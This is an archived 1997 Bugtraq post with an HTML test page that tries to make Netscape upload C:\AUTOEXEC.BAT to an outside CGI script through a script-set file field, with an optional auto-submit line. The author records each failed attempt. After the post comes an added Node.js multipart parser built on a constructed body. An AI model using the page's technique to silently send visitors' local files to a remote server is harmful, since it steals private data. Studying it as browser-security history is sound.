Bugtraq mailing list archives

Re: Netscape Exploit


From: robin.hood () IBM NET (Edwin Li-Kai Liu)
Date: Sun, 15 Jun 1997 17:52:26 +0700


This is a multi-part message in MIME format.
--------------D3FEBF5D9B509829435FAEDA
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Please "view" the HTML source to check whether it hurts before viewing this
page. I have written everything I want to say in this document.

--

Robin Hood
------------------------------------
Dreaming of a butterfly, fly into the sky.
¹Ú·QÅܦ¨½¹½º¡A­¸¤W¤ÑªÅ¡C


--------------D3FEBF5D9B509829435FAEDA
Content-Type: text/html; charset=us-ascii; name="eviljava.html"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="eviljava.html"
Content-Base: "file:///C|/Download/eviljava.html"


<HTML>
<HEAD>
    <TITLE>Netscape Bug Test</TITLE>
</HEAD>

<BODY>

<FORM NAME="foo"
    ENCTYPE="multipart/form-data"
    ACTION="http://acm.cs.umr.edu/~jferg/cgi-bin/print.pl"
    METHOD=POST>

<INPUT TYPE=HIDDEN NAME=USELESS VALUE="Just to force having a property">

<SCRIPT language=javascript>
// During this stage, the form is still under construction. This block is
// used only to generate the form.

    // document.write("<INPUT TYPE=FILE NAME=SIMPLE VALUE=\"C:\\AUTOEXEC.BAT\">");

    // document.write("<INPUT TYPE=HIDDEN NAME=SIMPLE VALUE=\"C:\\AUTOEXEC.BAT\">");

    document.write("<INPUT TYPE=FILE NAME=SIMPLE VALUE=\"C:\\AUTOEXEC.BAT\"");
    document.write("    FILENAME=\"C:\\AUTOEXEC.BAT\">");

</SCRIPT>

<BR><INPUT TYPE=SUBMIT VALUE="Just press here">&nbsp;&nbsp;&nbsp;
<INPUT TYPE=RESET VALUE="Reset everything">
</FORM>

<SCRIPT language=javascript>
// The form should be done during this stage. So we can manipulate the form data here.

    // document.foo.SIMPLE.open("C:\\AUTOEXEC.BAT");
    document.foo.SIMPLE.value = "C:\\AUTOEXEC.BAT";

    document.foo.SIMPLE.filename = "C:\\AUTOEXEC.BAT";

    // document.foo.SIMPLE.type="FILE";

    // Uncomment the following line for auto-submit.
    // document.foo.submit();
</SCRIPT>

<H2>The Netscape Bug Test Page</H2>
<H4>The following is what I have tried, in order to show my
responsibility for my postings to the mailing list</H4>

<P><I>Failure History:</I></P>

<OL>
  <LI>Generate the INPUT TYPE tag with the JavaScript document.write function. I
      hoped the bug was due to a lack of checks in document.write. Reason for
      failure: document.write treats the code as usual.</LI>
  <LI>Assign a value by JavaScript. Reason for failure: value ignored.</LI>
  <LI>Try to assign a default value to the INPUT TYPE, then Reset to force it to be set
      again. Reason for failure: no effect.</LI>
  <LI>Try to assign a default value to a different type, then force the input
      type to change to FILE. Reason for failure: TYPE is READONLY.</LI>
  <LI>Try the OPEN property of INPUT TYPE=FILE. Reason for failure: open is not a
      function.</LI>
  <LI>Try to have more than one element named SIMPLE in order to
      confuse Netscape, then try to set the form value of SIMPLE. Reason for
      failure: Netscape is not confused.</LI>
  <LI>Try to assign a value to a textbox and paste it into the textbox provided
      by INPUT TYPE=FILE. Reason for failure: there is no function to do that.</LI>
  <LI>Try to replace the VALUE attribute with FILENAME in SIMPLE. (Please look
      at the result produced by the CGI program.) Reason for failure: it doesn't
      work.</LI>
  <LI>Multiple SIMPLE file inputs all placed after the SIMPLE hidden input.
      Reason for failure: cannot even set up the file name manually.</LI>
</OL>




<P>I still believe that the way that allows the server to get the file contents, but
requires knowledge of the exact path name and file name, is to use the INPUT
TYPE=FILE method. However, it seemed very difficult to force a file to be assigned to
that form element. Therefore, my hypothesis is that there should be a bug that lets
a JavaScript program set the value of a secured form element.</P>


<P>Possible ways to research this might be: JavaScript and Security; Form Data
Manipulation; or related topics about JavaScript. However, it is not necessary to
stick with client-side JavaScript. I am not sure whether it is impossible to use
server-side JavaScript to accomplish this. Maybe the problem is due to a Java applet,
not JavaScript. The best way, but also the most difficult, is to debug the Netscape
program in order to clarify this.</P>


<P>I think it is definitely outside our topic to search for a bug in Netscape,
since originally we just wanted to "guess" how the bug works for hacking. Well, if
someone really wants the one thousand US dollar reward and a T-shirt, that person
may continue to do so. I will not research this anymore. But if you do find the
bug, I wish that you could give me the T-shirt. :-)</P>


<P>If you have any questions, you are welcome to e-mail
robin.hood () ibm net. I will be glad to take
your comments. Special thanks to Justin C. Ferguson, who provided the server-side
cgi-bin program that eased my testing.</P>

</BODY>
</HTML>


--------------D3FEBF5D9B509829435FAEDA--
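Added example, not code from the original post or from the print.pl CGI it mentions: a minimal Node.js parser for the multipart/form-data body that a form like eviljava.html produces, showing what the receiving script sees. The request body is constructed: the hidden USELESS field, the SIMPLE file field with an empty filename (the case where script could not preselect a path), and a hypothetical CHOSEN field for a file the user actually picked.

```javascript
// Added example (not the original post's code): a minimal multipart/form-data
// parser showing what a receiving CGI such as print.pl sees. The body is CONSTRUCTED
// to mirror eviljava.html: USELESS, SIMPLE left empty (script could not preselect
// a path), and for contrast a hypothetical file the user really chose.
const BOUNDARY = "----ConstructedBoundary1997";
const SAMPLE_BODY = [
  `--${BOUNDARY}`,
  'Content-Disposition: form-data; name="USELESS"',
  "",
  "Just to force having a property",
  `--${BOUNDARY}`,
  'Content-Disposition: form-data; name="SIMPLE"; filename=""',
  "Content-Type: application/octet-stream",
  "",
  "",
  `--${BOUNDARY}`,
  'Content-Disposition: form-data; name="CHOSEN"; filename="notes.txt"',
  "Content-Type: text/plain",
  "",
  "user-selected contents",
  `--${BOUNDARY}--`,
  "",
].join("\r\n");
// Split a body into parts {name, filename, data}; filename is null for an
// ordinary field and "" for a file field in which nothing was selected.
function parseMultipart(body, boundary) {
  const parts = [];
  for (const chunk of body.split(`--${boundary}`).slice(1)) {
    if (chunk.startsWith("--")) break;           // closing delimiter reached
    const sep = chunk.indexOf("\r\n\r\n");       // end of the part's headers
    const headers = {};
    for (const line of chunk.slice(2, sep).split("\r\n")) {
      const i = line.indexOf(":");
      headers[line.slice(0, i).toLowerCase()] = line.slice(i + 1).trim();
    }
    const disp = headers["content-disposition"] || "";
    const name = /;\s*name="([^"]*)"/.exec(disp);
    const filename = /;\s*filename="([^"]*)"/.exec(disp);
    parts.push({
      name: name ? name[1] : null,
      filename: filename ? filename[1] : null,
      data: chunk.slice(sep + 4, -2),            // drop CRLF before next delimiter
    });
  }
  return parts;
}
// What a server should log as an upload: file parts that carry a name and content.
function uploadedFiles(parts) {
  return parts.filter((p) => p.filename && p.data.length > 0);
}
```

With this body, SIMPLE arrives as an empty file part, so uploadedFiles() reports only the user-chosen file.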


